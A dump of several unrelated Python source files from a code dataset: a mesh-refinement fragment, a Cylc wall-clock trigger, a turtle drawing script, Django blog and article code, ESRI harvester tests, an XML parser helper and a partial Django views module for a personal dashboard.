stepLength = i * numEnrich
uDWR = primalResidual[stepLength:stepLength + numEnrich].dot(
(1 - adjointGradState)[stepLength:stepLength + numEnrich])
qDWR = primalResidual[uLength + stepLength:uLength +
stepLength + numEnrich]\
.dot((1 - adjointGradState)[uLength + stepLength:uLength +
stepLength + numEnrich])
residual[i] = uDWR + qDWR
# sort residual index
residualIndex = np.argsort(np.abs(residual))
# select top \theta% elements with the largest error
theta = 0.15
refineIndex = residualIndex[
int(self.numEle * (1 - theta)):len(residual)] + 1
return np.abs(np.sum(residual)), refineIndex
def adaptive(self):
TOL = self.coeff.TOL
estError = 10
nodeCount = 0
maxCount = self.coeff.MAXIT
while estError > TOL and nodeCount < maxCount:
# solve
self.solvePrimal()
self.solveAdjoint()
# plot the solution at certain counter
if nodeCount in [0, 4, 9, 19, maxCount]:
plt.clf()
self.plotState(nodeCount)
# record error
self.trueErrorList[0].append(self.numEle)
self.trueErrorList[1].append(
self.primalSoln[self.numEle * self.numBasisFuncs - 1])
estError, index = self.DWResidual()
self.estErrorList[0].append(self.numEle)
self.estErrorList[1].append(estError)
# adapt
index = index.tolist()
self.meshAdapt(index)
self.numEle = self.numEle + len(index)
nodeCount += 1
print("Iteration {}. Estimated target function error {:.3e}."
.format(nodeCount, estError))
if nodeCount == maxCount:
print("Max iteration number is reached "
"while the convergence criterion is not satisfied.\n"
"Check the problem statement or "
"raise the max iteration number, then try again.\n")
| mit | 3,414,982,141,776,126,000 | 38.950495 | 101 | 0.547212 | false |
trwhitcomb/cylc | cylc/flow/xtriggers/wall_clock.py | 1 | 1243 | #!/usr/bin/env python3
# THIS FILE IS PART OF THE CYLC SUITE ENGINE.
# Copyright (C) 2008-2019 NIWA & British Crown (Met Office) & Contributors.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""xtrigger function to check cycle point offset against the wall clock.
"""
from time import time
from cylc.flow.cycling.iso8601 import interval_parse
def wall_clock(offset=None, point_as_seconds=None):
"""Return True if now > (point + offset) else False."""
if offset is None:
offset_as_seconds = 0
else:
offset_as_seconds = int(interval_parse(offset).get_seconds())
return time() > (point_as_seconds + offset_as_seconds)
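if __name__ == '__main__':
    # Minimal sketch: in real use the Cylc scheduler supplies point_as_seconds
    # from the task's cycle point; here it is faked with the current time, so a
    # one-hour offset ('PT1H', assumed to be accepted by interval_parse) should
    # print False.
    print(wall_clock(offset='PT1H', point_as_seconds=int(time())))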
| gpl-3.0 | 1,752,127,795,411,126,800 | 36.666667 | 75 | 0.729686 | false |
IntSPstudio/vslst-python | sta/980004006.py | 1 | 1674 | #|==============================================================|#
# Made by IntSPstudio
# Project Visual Street
# ID: 980004006
# Twitter: @IntSPstudio
#|==============================================================|#
#SYSTEM
import os
import sys
#import time
import turtle
import math
#ALG
#Circumference of the circle
def calcCircleRl(rlRadius):
#2PIR
output = 2*pi*rlRadius
return output
#Calculates the arc length of a circle slice
def calcCircleSliceRl(rlAngle,rlRadius):
output = rlAngle/360*pi*rlRadius*2
return output
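#Example (sketch): for a radius-10 circle a 90 degree slice is a quarter of the
#full circumference, so calcCircleSliceRl(90,10) == calcCircleRl(10)/4 (~15.71).
#Note both helpers rely on the global "pi" assigned further below.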
#CONTENT SCREEN
contentscreen = turtle.Screen()
contentscreen.bgcolor("black")
#TURTLE
julle = turtle.Turtle()
julle.color("white")
julle.speed(5)
#INPUT
scriptFle = sys.argv[0]
scriptCircleRadius = sys.argv[1]
scriptCircleSliceAngle = sys.argv[2]
#BASIC VRB
#systemContinuity =1
pi = math.pi
inputCircleRadius = int(scriptCircleRadius)
inputCircleSliceAngle = int(scriptCircleSliceAngle)
inputCircleRl = calcCircleRl(inputCircleRadius)
inputCircleSliceRl = calcCircleSliceRl(inputCircleSliceAngle,inputCircleRadius)
#CLEAR SCREEN
os.system("cls")
#PRINT DATA
print(" Radius:", inputCircleRadius)
print(" Slice:", scriptCircleSliceAngle)
print("Circle Rl:", inputCircleRl)
print(" Slice Rl:", inputCircleSliceRl)
print(" %Rld:", inputCircleSliceRl / inputCircleRl *100)
#ACTION
#Start position
julle.penup()
julle.forward(inputCircleRadius)
julle.left(90)
julle.pendown()
#Circle
julle.circle(inputCircleRadius)
#Slice
julle.pendown()
julle.left(90)
julle.forward(inputCircleRadius)
julle.right(180 - inputCircleSliceAngle)
julle.forward(inputCircleRadius)
julle.right(180)
julle.forward(inputCircleRadius)
#Wait
contentscreen.mainloop()
os.system("cls") | mit | -8,946,986,960,882,005,000 | 23.231884 | 79 | 0.72711 | false |
les-patissiers-du-web/django-website | patissiers/blog/tests/test_model_post.py | 1 | 1648 | # -*- coding: utf8 -*-
from __future__ import unicode_literals
from django.test import TestCase
from blog.models import Post, Category
import datetime
class PostTestCase(TestCase):
def setUp(self):
# Category
category = Category.objects.create(name='category', created=datetime.date.today())
# Draft post
Post.objects.create(title='Draft post',
category=category,
status=Post.STATUS_DRAFT,
excerpt='draft post',
slug='draft-post',
permalink='http://darkelda.net/draft-post',
description='',
content='#Draft post',
created=datetime.date.today())
def test_title(self):
post = Post.objects.get(slug='draft-post')
self.assertEqual(post.__unicode__(), post.title)
def test_creation(self):
category = Category.objects.get(name='category')
post = Post.objects.create(title='Hello world',
category=category,
status=Post.STATUS_DRAFT,
excerpt='Hello world, I\'m a software engineer',
slug='hello-world',
permalink='http://darkelda.net/hello-world',
description='',
content='#hello world',
created=datetime.date.today())
self.assertTrue(isinstance(post, Post)) | mit | 3,740,815,236,420,486,000 | 36.477273 | 90 | 0.482403 | false |
progdupeupl/pdp_website | pdp/article/models.py | 1 | 7425 | # coding: utf-8
#
# This file is part of Progdupeupl.
#
# Progdupeupl is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Progdupeupl is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Progdupeupl. If not, see <http://www.gnu.org/licenses/>.
"""Models for article app."""
import os
import string
from django.db import models
# from django.db.models.signals import post_save
from django.conf import settings
# from django.dispatch import receiver
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from taggit.managers import TaggableManager
from pdp.utils import slugify
from pdp.utils.models import has_changed
from pdp.tutorial.models import Tutorial
from PIL import Image
from io import BytesIO
from django.core.files.uploadedfile import SimpleUploadedFile
IMAGE_MAX_WIDTH = 64
IMAGE_MAX_HEIGHT = 64
def image_path(instance, filename):
"""Return path to an article image.
Returns:
string
"""
ext = filename.split('.')[-1]
    filename = u'original.{}'.format(ext.lower())
return os.path.join('articles', str(instance.pk), filename)
def thumbnail_path(instance, filename):
"""Return path to an article thumbnail.
Returns:
string
"""
ext = filename.split('.')[-1]
    filename = u'thumb.{}'.format(ext.lower())
return os.path.join('articles', str(instance.pk), filename)
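# For example (illustrative values): an Article with pk 42 and an uploaded file
# named "Photo.JPG" would get image_path() == 'articles/42/original.jpg' and
# thumbnail_path() == 'articles/42/thumb.jpg'.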
class ArticleCategory(models.Model):
"""A way to organize article in different category."""
class Meta:
verbose_name = u'Catégorie d’article'
verbose_name_plural = u'Catégories d’article'
title = models.CharField(u'Titre', max_length=80)
slug = models.SlugField(max_length=80)
def __str__(self):
"""Textual representation of a category.
Returns:
string
"""
return self.title
def get_absolute_url(self):
"""Get URL to view the category.
Returns:
string
"""
return reverse('pdp.article.views.by_category', args=(
self.slug,
))
def get_article_count(self):
"""Return number of articles in this category."""
return Article.objects \
.filter(is_visible=True) \
.filter(category__pk=self.pk).count()
class Article(models.Model):
"""An article."""
class Meta:
verbose_name = u'Article'
verbose_name_plural = u'Articles'
title = models.CharField(u'Titre', max_length=80)
description = models.CharField(u'Description', max_length=200)
text = models.TextField(u'Texte', blank=True)
author = models.ForeignKey(User, verbose_name=u'Auteur',
related_name='articles')
slug = models.SlugField(max_length=80)
pubdate = models.DateTimeField(u'Date de publication', blank=True)
tags = TaggableManager()
image = models.ImageField(upload_to=image_path,
blank=True, null=True, default=None)
thumbnail = models.ImageField(upload_to=thumbnail_path,
blank=True, null=True, default=None)
is_visible = models.BooleanField(u'Est visible publiquement',
default=False)
is_pending = models.BooleanField(u'Est en attente', default=False)
is_beta = models.BooleanField(u'Est visible par les membres',
default=False)
category = models.ForeignKey(ArticleCategory, null=True, blank=True,
verbose_name=u'Catégorie')
to_tutorial = models.ForeignKey(Tutorial,
verbose_name=u'Tutoriel correspondant',
null=True, blank=True)
def __str__(self):
"""Textual representation of an article.
Returns:
string
"""
return self.title
def get_absolute_url(self):
"""Get URL to view the article.
Returns:
string
"""
return reverse('pdp.article.views.redirect_view', args=(
self.pk, self.slug,
))
def get_pdf_url(self):
"""Get URL to get a PDF file of this article."""
return u'{}/articles/{}/{}.pdf'.format(
settings.MEDIA_URL,
self.pk,
self.slug,
)
def get_edit_url(self):
"""Get URL to edit the article.
Returns:
string
"""
return '/articles/editer?article={0}'.format(self.pk)
def get_download_url(self):
return u'{}?article={}'.format(
reverse('pdp.article.views.download'),
self.pk)
def save(self, force_update=False, force_insert=False,
thumb_size=(IMAGE_MAX_HEIGHT, IMAGE_MAX_WIDTH)):
"""Save the article.
This will save thumbnail on disk and then save the model in database.
"""
self.slug = slugify(self.title)
if has_changed(self, 'image') and self.image:
# TODO : delete old image
image = Image.open(self.image)
if image.mode not in ('L', 'RGB'):
image = image.convert('RGB')
image.thumbnail(thumb_size, Image.ANTIALIAS)
# save the thumbnail to memory
            temp_handle = BytesIO()
image.save(temp_handle, 'png')
temp_handle.seek(0) # rewind the file
# save to the thumbnail field
suf = SimpleUploadedFile(os.path.split(self.image.name)[-1],
temp_handle.read(),
content_type='image/png')
self.thumbnail.save('{}.png'.format(suf.name), suf, save=False)
# save the image object
super().save(force_update, force_insert)
else:
super().save()
def get_last_articles():
"""Get the last published articles.
This should be used for the home page article displaying.
Returns:
list of Article
"""
return Article.objects.all()\
.filter(is_visible=True)\
.order_by('-pubdate')[:5]
def get_prev_article(g_article):
"""Try to get the previous article ordered by pubdate.
If g_article is the first article ever, None will be returned.
Returns:
Article
"""
try:
return Article.objects\
.filter(is_visible=True)\
.filter(pubdate__lt=g_article.pubdate)\
.order_by('-pubdate')[0]
except IndexError:
return None
def get_next_article(g_article):
"""Try to get the next article ordered by pubdate.
If g_article is the last one, None will be returned.
Returns:
Article
"""
try:
return Article.objects\
.filter(is_visible=True)\
.filter(pubdate__gt=g_article.pubdate)\
.order_by('pubdate')[0]
except IndexError:
return None
| agpl-3.0 | -5,753,180,119,510,398,000 | 26.072993 | 77 | 0.600566 | false |
FireCARES/harvester | tests/test_esri_harvest.py | 1 | 1453 | import unittest
from harvester.providers.esri import RESTHarvester
from harvester.util import chunk
from harvester.transform.esri import ESRIJSON
from tests import TEST_DIR
from tests.util import load_mock
import requests_mock
import os
@requests_mock.Mocker()
class TestESRIHarvesting(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_chunking(self, m):
m.register_uri('GET',
'http://www.esriserver.com/arcgis/rest/services/namespace/group/MapServer/0/'
'query?where=1%3D1&returnGeometry=false&returnIdsOnly=true&f=pjson',
text=load_mock('ids.json'))
harvester = RESTHarvester('http://www.esriserver.com/arcgis/rest/services/namespace/group/MapServer/0', data_dir=TEST_DIR)
self.assertEqual(list(chunk([], 1)), [])
self.assertEqual(list(chunk([1, 2, 3, 4], 2)), [[1, 2], [3, 4]])
ids = harvester.get_objectids()
self.assertEqual(len(list(chunk(ids, 500))), 8)
self.assertEqual(len(list(chunk(ids, 200))), 20)
def test_transform_to_geojson(self, m):
ESRIJSON.to_geojson('tests/mock/ex_features.json')
self.assertTrue(os.path.exists('tests/mock/ex_features.geojson'))
# Can we run again and overwrite the existing file w/o issue?
ESRIJSON.to_geojson('tests/mock/ex_features.json')
os.remove('tests/mock/ex_features.geojson')
| gpl-2.0 | 2,154,707,532,743,372,500 | 38.27027 | 130 | 0.659326 | false |
mdsitton/pyogl | pglgen/xmlparse.py | 1 | 3930 | from xml.parsers import expat
class TagStack(object):
def __init__(self):
self.tags = []
self.args = []
self.data = []
self.dataAdded = []
self.stackSize = 0
self.frameHasData = False
def push(self, tag, args):
self.tags.append(tag)
self.args.append(args)
self.data.append([])
self.dataAdded.append(False)
self.stackSize += 1
def add_data(self, data):
self.data[self.stackSize-1].append(data)
self.dataAdded[-1] = True
def clear_frame_data(self):
self.data[self.stackSize-1] = []
self.dataAdded[-1] = False
def is_data_added(self, posRel=0):
pos = -1 - posRel
return self.dataAdded[pos]
def pop(self):
self.dataAdded.pop()
stackFrame = (self.tags.pop(), self.args.pop(), self.data.pop())
self.stackSize -= 1
return stackFrame
def peek(self, posRel=0):
pos = -1 - posRel
return (self.tags[pos], self.args[pos], self.data[pos])
def path(self):
return '/'.join(self.tags)
class BaseParser(object):
def __init__(self, xmlParser, tag, parent, root):
# This is a hacky workaround to be able to pass in a data string
# to be accessed by any sub-parsers.
if isinstance(parent, str) or isinstance(parent, bytes):
self.strdata = parent
parent = None
else:
self.strdata = parent.strdata
self.xmlParser = xmlParser
self.parent = parent
self.tag = tag
self.root = root
if self.parent is None and self.tag is None and self.root is None:
self.isRoot = True
else:
self.isRoot = False
if self.isRoot:
self.stack = TagStack()
self.root = self
else:
self.stack = self.root.stack
self.parsers = {}
self.set_handlers()
self.init_data(self.strdata)
def set_handlers(self):
self.xmlParser.StartElementHandler = self.start
self.xmlParser.CharacterDataHandler = self.data
self.xmlParser.EndElementHandler = self.end
def restore_handlers(self):
if self.parent is not None:
self.parent.set_handlers()
def start(self, tag, attrs):
self.stack.push(tag, attrs)
tagPath = self.stack.path()
for parser in self.parsers:
if parser == tagPath:
ParserClass = self.parsers[parser]['object']
parInst = self.switch_parser(ParserClass)
self.parsers[parser]['instance'] = parInst
def data(self, data):
# We need to check if the stack frame has been used
# previously and clear the previous data if so.
if self.stack.is_data_added() is True:
self.stack.clear_frame_data()
self.stack.add_data(data.strip())
self.parse()
def end(self, tag):
if self.stack.is_data_added() is False:
self.parse()
if tag == self.tag:
self.integrate()
self.restore_handlers()
self.stack.pop()
def switch_parser(self, parser):
tag, attrs, data = self.stack.peek()
return parser(self.xmlParser, tag, self, self.root)
def register_parser(self, stackTree, parser):
self.parsers[stackTree] = {'object': parser}
# The following method stubs are what the parsing sub-classes
# will be implemented within.
def init_data(self, strData):
pass
def parse(self):
pass
def integrate(self):
pass
def parse_xml(rootParser, xmlPath, strdata):
xmlParser = expat.ParserCreate()
root = rootParser(xmlParser, None, strdata, None)
with open(xmlPath, 'rb') as xmlFile:
for line in xmlFile:
xmlParser.Parse(line.strip(), 0)
xmlParser.Parse(b'', 1)
return root
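# Minimal usage sketch. The tag names, file name and XML layout below are
# assumptions for illustration only; it expects an items.xml shaped like
# <catalog><item name="a"/><item name="b"/></catalog> next to this module.
class _ItemParser(BaseParser):
    def parse(self):
        tag, attrs, data = self.stack.peek()
        if tag == 'item' and 'name' in attrs:
            self.parent.names.append(attrs['name'])
class _CatalogParser(BaseParser):
    def init_data(self, strData):
        self.names = []
        self.register_parser('catalog/item', _ItemParser)
if __name__ == '__main__':
    root = parse_xml(_CatalogParser, 'items.xml', '')
    print(root.names)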
| bsd-2-clause | 870,257,657,208,985,100 | 25.554054 | 74 | 0.577354 | false |
utarsuno/urbtek | nexus_django/nexus_front_end/views.py | 1 | 45865 | # coding=utf-8
"""
This module, views.py, is where all the backend and frontend server requests are handled and returned to the user.
"""
# Needed to send back a rendered HTML page.
from django.shortcuts import render
# Needed for sending a simple HttpResponse such as a string response.
from django.http import HttpResponse
# Needed for allowing POST requests without requiring a CSRF token.
from django.views.decorators.csrf import csrf_exempt
# Needed for user verification.
from django.contrib.auth import authenticate, login, logout
# Needed for requiring the user to be logged in.
from django.contrib.auth.decorators import login_required
# Needed to perform HttpRequests to run Locust.
import requests
# Needed for making JsonResponses.
from django.http import JsonResponse
# Needed to check data on Users.
from django.contrib.auth.models import User
import sys
#sys.path.remove('/home/dev_usr/urbtek/nexus_django')
sys.path.append('/home/dev_usr/urbtek')
# Needed for database access.
from database import database_api
from database import table_definitions
# Needed for sending emails.
from universal_code import sms_sender
# Needed for debugging.
from universal_code import debugging as dbg
from quality_assurance.load_testing import locust_api
import datetime
import time
import pytz
# Importing custom defined models.
from .models import ScheduledTextNotification
from .models import Dividend
from .models import Project
from .models import SeleniumTest
from .models import TestSuiteRuns
from .models import SpecificSeleniumTestRun
from .models import WorkHours
from .models import Feedback
from universal_code import nexus_build_number as nbm
from quality_assurance.selenium_scripts.qa import qa_selenium_scripts as qss
from quality_assurance.selenium_scripts import test_parser
from quality_assurance.selenium_scripts import selenium_base
import ast
''' __ __ __ ___ ___ __ __ ___ __ ___ __ ___ __ __
/ _` | / \ |__) /\ | | | | | | | | \ / \ / /\ |__) | /\ |__) | |__ /__` _|_ |__ | | |\ | / ` | | / \ |\ | /__`
\__> |___ \__/ |__) /~~\ |___ \__/ | | |___ | | | \/ /~~\ | \ | /~~\ |__) |___ |___ .__/ | | \__/ | \| \__, | | \__/ | \| .__/
'''
# If the peon is currently free or not.
peon_is_free = False
# Get the number of git commits made to this project.
NEXUS_BUILD_NUMBER = nbm.get_nexus_build_number()
# Needed for database operations.
db = database_api.DatabaseConnectionForNexus()
db_api = database_api.DatabaseAPI(db)
# Needed for getting information on and running selenium tests.
qa_selenium_scripts = qss.QASeleniumScripts()
UTF_8 = 'utf-8'
current_locust = None
LOGIN_URL = 'login'
NEXUS_FRONT_END = 'templates/nexus_front_end/'
OUTSIDE_PAGES = NEXUS_FRONT_END + 'outside_pages/'
OUTSIDE_PAGES_LOGIN = OUTSIDE_PAGES + 'login.html'
OUTSIDE_PAGES_REGISTER = OUTSIDE_PAGES + 'register.html'
OUTSIDE_PAGES_ACCOUNT_RECOVER = OUTSIDE_PAGES + 'account_recover.html'
PERSONAL_PAGES = NEXUS_FRONT_END + 'personal'
PERSONAL_PAGES_TRADING = PERSONAL_PAGES + '/trading.html'
PERSONAL_PAGES_HOME = PERSONAL_PAGES + '/home.html'
PERSONAL_PAGES_PROFILE = PERSONAL_PAGES + '/profile.html'
PERSONAL_PAGES_SLEEP = PERSONAL_PAGES + '/sleep.html'
PERSONAL_PAGES_TEXT_NOTIFICATIONS = PERSONAL_PAGES + '/text_notifications.html'
QA_PAGES = NEXUS_FRONT_END + 'qa'
QA_PAGES_NATIONALS = QA_PAGES + '/nationals/nationals.html'
QA_PAGES_SELF = QA_PAGES + '/self_testing/qa_self_testing.html'
QA_PAGES_SELF_SELENIUM_TESTS = QA_PAGES + '/self_testing/qa_selenium_tests.html'
QA_PAGES_SK = QA_PAGES + '/sk/sk_selenium_tests.html'
ADMIN_PAGES = NEXUS_FRONT_END + 'admin/'
ADMIN_PAGES_ADMIN = ADMIN_PAGES + 'admin.html'
ADMIN_PAGES_DATABASE = ADMIN_PAGES + 'database.html'
ADMIN_PAGES_SERVERS = ADMIN_PAGES + 'servers.html'
SCC_PAGES = NEXUS_FRONT_END + 'scc/'
SCC_PAGES_IMAGE_COMPRESSION = SCC_PAGES + 'image_compression.html'
PERSONAL_PAGES_WORK_HOURS_LOGGING = SCC_PAGES + 'work_hours_logging.html'
PEON_URL = 'peon_url'
PEON_IP_URL = 'http://23.253.22.69:1337/'
# POST parameter names.
USERNAME = 'username'
EMAIL = 'email'
PASSWORD = 'password'
FIRST_NAME = 'first_name'
LAST_NAME = 'last_name'
CONTENT = 'content'
CUSTOM_SQL_COMMAND = 'custom_sql_command'
NUMBER_OF_USERS = 'number_of_users'
SPAWN_RATE = 'spawn_rate'
TEST_DURATION = 'test_duration'
JOINED_DATE = 'joined_date'
PHONE_NUMBER = 'phone_number'
CELL_CARRIER = 'cell_carrier'
ZIP_CODE = 'zip_code'
BIRTHDAY = 'birthday'
MESSAGE_CONTENT = 'content'
MESSAGE_TIME = 'time'
MESSAGE_DATE = 'date'
PAGE_SENT_FROM = 'page_sent_from'
PAYMENT_PER_SHARE = 'payment_per_share'
STOCK_TICKER_SYMBOL = 'stock_symbol'
NUMBER_OF_SHARES = 'number_of_shares'
PAYOUT_DATE = 'payout_date'
TEST_NAME = 'test_name'
TEST_RUN_TIME = 'test_run_time'
TEST_PASS_OR_FAIL = 'test_pass_or_fail'
TEST_NOTES = 'test_notes'
BROWSER_USED = 'browser_used'
UNIQUE_ID = 'unique_id'
# Field names for Selenium Testing.
PROJECT_NAME = 'project_name'
PROJECT_DESCRIPTION = 'project_description'
IS_FRONT_END = 'is_front_end'
CURRENT_HOME_URL = 'current_home_url'
TEST_NAME = 'test_name'
TEST_DESCRIPTION = 'test_description'
DATE_TIME_RAN = 'date_time_ran'
SPECIFIC_TEST_RUN_IDS = 'specific_test_run_ids'
SELENIUM_TEST = 'selenium_test'
RUN_ID = 'run_id'
RUN_TIME = 'run_time'
OUTPUT = 'output'
PASSED = 'passed'
BROWSER_USED = 'browser_used'
# Field names for work hours logging.
START_OR_STOP_TIME = 'start_or_stop_time'
IS_START_TIME = 'is_start_time'
# Server response messages.
SERVER_REPLY_INVALID_POST_DATA_ERROR = HttpResponse('Invalid POST data!')
SERVER_REPLY_INVALID_NUMBER_OF_POST_ARGUMENTS_ERROR = HttpResponse('Invalid number of POST arguments!')
SERVER_REPLY_GENERIC_NO = HttpResponse('n')
SERVER_REPLY_GENERIC_YES = HttpResponse('y')
SERVER_REPLY_GENERIC_LOGIC_ERROR = HttpResponse('l')
SERVER_REPLY_GENERIC_SERVER_ERROR = HttpResponse('s')
def check_POST_arguments(arguments, request):
"""Just a utility function to raise an exception if there is an in-correct match on POST arguments.
:param arguments: The arguments to check for.
:param request: Contains information regarding the request sent in.
:return: Boolean indicating if this threw an exception or not.
"""
if len(request.POST) != len(arguments):
dbg.raise_exception(dbg.MyException, 'Got ' + str(len(request.POST)) + ' number of arguments instead of ' + str(len(arguments)))
		return SERVER_REPLY_INVALID_NUMBER_OF_POST_ARGUMENTS_ERROR
for arg in arguments:
if arg not in request.POST:
dbg.raise_exception(dbg.MyException, 'Argument not passed in : ' + str(arg) + '.')
			return SERVER_REPLY_INVALID_POST_DATA_ERROR
return None
''' ___ __ __ ___ ___ __
|__ |__) / \ |\ | | |__ |\ | | \
| | \ \__/ | \| | |___ | \| |__/
'''
@csrf_exempt
def login_GET(request):
"""This handles the GET request to retrieve the login page.
:param request: Contains information regarding the request sent in.
:return: The login page.
"""
specific_page_after_login = request.GET.get('next', 'no_next')
if specific_page_after_login == 'no_next':
return render(request, OUTSIDE_PAGES_LOGIN, {'redirect_url': 'profile', 'build_number': NEXUS_BUILD_NUMBER})
else:
return render(request, OUTSIDE_PAGES_LOGIN, {'redirect_url': specific_page_after_login, 'build_number': NEXUS_BUILD_NUMBER})
@login_required(login_url=LOGIN_URL)
def profile_GET(request):
"""This handles the GET request to retrieve the profile page.
:param request: Contains information regarding the request sent in.
:return: The profile page.
"""
current_user = request.user
#print('Cell carrier for ' + str(current_user) + ' is ' + current_user.profile.cell_carrier + '.')
return render(request, PERSONAL_PAGES_PROFILE, {'cell_carriers': sorted(sms_sender.cell_carriers_dictionary.keys()), 'current_cell_carrier': current_user.profile.cell_carrier, 'build_number': NEXUS_BUILD_NUMBER})
@login_required(login_url=LOGIN_URL)
def home_GET(request):
"""This handles the GET request to retrieve the home page.
:param request: Contains information regarding the request sent in.
:return: The home page.
"""
return render(request, PERSONAL_PAGES_HOME, {'build_number': NEXUS_BUILD_NUMBER})
def register_GET(request):
"""This handles the GET request to retrieve the register page.
:param request: Contains information regarding the request sent in.
:return: The register page.
"""
return render(request, OUTSIDE_PAGES_REGISTER)
def account_recover_GET(request):
"""This handles the GET request to retrieve the account recover page.
:param request: Contains information regarding the request sent in.
:return: The account recover page.
"""
return render(request, OUTSIDE_PAGES_ACCOUNT_RECOVER)
@login_required(login_url=LOGIN_URL)
def logout_GET(request):
"""This handles the GET request to logout. It will return the login page and logout the user.
:param request: Contains information regarding the request sent in.
:return: The login page.
"""
logout(request)
return render(request, OUTSIDE_PAGES_LOGIN)
@login_required(login_url=LOGIN_URL)
def trading_GET(request):
"""This handles the GET request to retrieve the trading page.
:param request: Contains information regarding the request sent in.
:return: The trading html page.
"""
return render(request, PERSONAL_PAGES_TRADING, {'dividend_data': Dividend.objects.filter(user=request.user), 'build_number': NEXUS_BUILD_NUMBER})
@login_required(login_url=LOGIN_URL)
def servers_GET(request):
"""This handles the GET request to retrieve the servers page.
:param request: Contains information regarding the request sent in.
:return: The servers html page.
"""
return render(request, ADMIN_PAGES_SERVERS, {'build_number': NEXUS_BUILD_NUMBER})
@login_required(login_url=LOGIN_URL)
def sleep_GET(request):
"""This handles the GET request to retrieve the sleep page.
:param request: Contains information regarding the request sent in.
:return: The sleep HTML page.
"""
return render(request, PERSONAL_PAGES_SLEEP, {'build_number': NEXUS_BUILD_NUMBER})
@login_required(login_url=LOGIN_URL)
def qa_GET(request):
"""This handles the GET request to retrieve the qa self testing page.
:param request: Contains information regarding the request sent in.
:return: The qa self testing HTML page.
"""
return render(request, QA_PAGES_SELF, {'build_number': NEXUS_BUILD_NUMBER})
@login_required(login_url=LOGIN_URL)
def nationals_GET(request):
"""This handles the GET request to retrieve the nationals page.
:param request: Contains information regarding the request sent in.
:return: The nationals testing HTML page.
"""
return render(request, QA_PAGES_NATIONALS, {'build_number': NEXUS_BUILD_NUMBER})
@login_required(login_url=LOGIN_URL)
def qa_selenium_tests_GET(request):
"""This handles the GET request to retrieve the qa selenium test page.
:param request: Contains information regarding the request sent in.
:return: The QA Selenium Tests page.
"""
all_selenium_tests = test_parser.get_test_functions_from_file(test_parser.QA_PATH)
return render(request, QA_PAGES_SELF_SELENIUM_TESTS, {'number_of_selenium_tests': len(all_selenium_tests) * len(selenium_base.SUPPORTED_BROWSERS), 'all_selenium_tests': all_selenium_tests, 'build_number': NEXUS_BUILD_NUMBER})
@login_required(login_url=LOGIN_URL)
def sk_selenium_tests_GET(request):
"""This handles the GET request to retrieve the SK page.
:param request: Contains information regarding the request sent in.
:return: The SK testing HTML page.
"""
all_selenium_tests = test_parser.get_test_functions_from_file(test_parser.SK_PATH)
return render(request, QA_PAGES_SK, {'all_selenium_tests': all_selenium_tests, 'number_of_selenium_tests': len(all_selenium_tests) * len(selenium_base.SUPPORTED_BROWSERS), 'build_number': NEXUS_BUILD_NUMBER})
@login_required(login_url=LOGIN_URL)
def database_GET(request):
"""This handles the GET request to retrieve the database page.
:param request: Contains information regarding the request sent in.
:return: The database HTML page.
"""
return render(request, ADMIN_PAGES_DATABASE, {'build_number': NEXUS_BUILD_NUMBER})
@login_required(login_url=LOGIN_URL)
def image_compression_GET(request):
"""This handles the GET request to retrieve the compression page.
:param request: Contains information regarding the request sent in.
:return: The compression HTML page.
"""
return render(request, SCC_PAGES_IMAGE_COMPRESSION, {'build_number': NEXUS_BUILD_NUMBER})
def get_current_time_as_string():
right_now = datetime.datetime.now()
current_hour = str(right_now.time().hour)
if len(current_hour) == 1:
current_hour = '0' + current_hour
current_minute = str(right_now.time().minute)
if len(current_minute) == 1:
current_minute = '0' + current_minute
return current_hour + ':' + current_minute
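# Note: the helper above produces the same zero-padded string as
# datetime.datetime.now().strftime('%H:%M').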
def get_current_date_as_string():
return datetime.datetime.strftime(datetime.datetime.now().date(), '%m/%d/%Y')
@login_required(login_url=LOGIN_URL)
def text_notifications_GET(request):
"""This handles the GET request to retrieve the text notifications page.
:param request: Contains information regarding the request sent in.
:return: The text notifications HTML page.
"""
a = ScheduledTextNotification.objects.filter(user=request.user)
# Find all the currently scheduled text notifications.
print('Printing all text notifications for user :' + str(request.user))
for p in a:
print(p)
return render(request, PERSONAL_PAGES_TEXT_NOTIFICATIONS, {'current_time': get_current_time_as_string(), 'current_date': get_current_date_as_string(), 'build_number': NEXUS_BUILD_NUMBER, 'scheduled_text_messages': a, 'current_text_messages': a})
@login_required(login_url=LOGIN_URL)
def work_hours_logging_GET(request):
"""This handles the GET request to retrieve the work hours logging page.
:param request: Contains information regarding the request sent in.
:return: The work hours logging HTML page.
"""
all_work_hours = WorkHours.objects.filter(user=request.user)
all_work_hours_for_this_week = []
all_work_hours_outside_of_this_week = []
today = datetime.datetime.today()
today = today.replace(tzinfo=pytz.utc)
today = today.replace(hour=0, minute=0, second=0)
day_of_week = today.weekday()
to_end_of_week = datetime.timedelta(days=6-day_of_week)
end_of_week = today + to_end_of_week
to_beginning_of_week = datetime.timedelta(days=day_of_week)
beginning_of_week = today - to_beginning_of_week
this_week = {0: [], 1: [], 2: [], 3: [], 4: [], 5: [], 6: []}
days = {0: 'Monday', 1: 'Tuesday', 2: 'Wednesday', 3: 'Thursday', 4: 'Friday', 5: 'Saturday', 6: 'Sunday'}
#print('Printing hours!')
for hours in all_work_hours:
# Get the DateTime object.
local_date_time = hours.start_or_stop_time
if local_date_time > beginning_of_week:
this_week[local_date_time.weekday()].append(local_date_time)
all_work_hours_for_this_week.append(hours)
else:
all_work_hours_outside_of_this_week.append(hours)
day_summary = []
hours_worked_for_the_week = 0
# Go through each day. e is the day number starting at 0.
for e in this_week:
this_week[e].sort()
total_seconds_for_the_day = 0
for i, t in enumerate(this_week[e]):
if i % 2 != 0:
delta = t - this_week[e][i - 1]
total_seconds_for_the_day += delta.total_seconds()
total_hours_worked = total_seconds_for_the_day / 3600.0
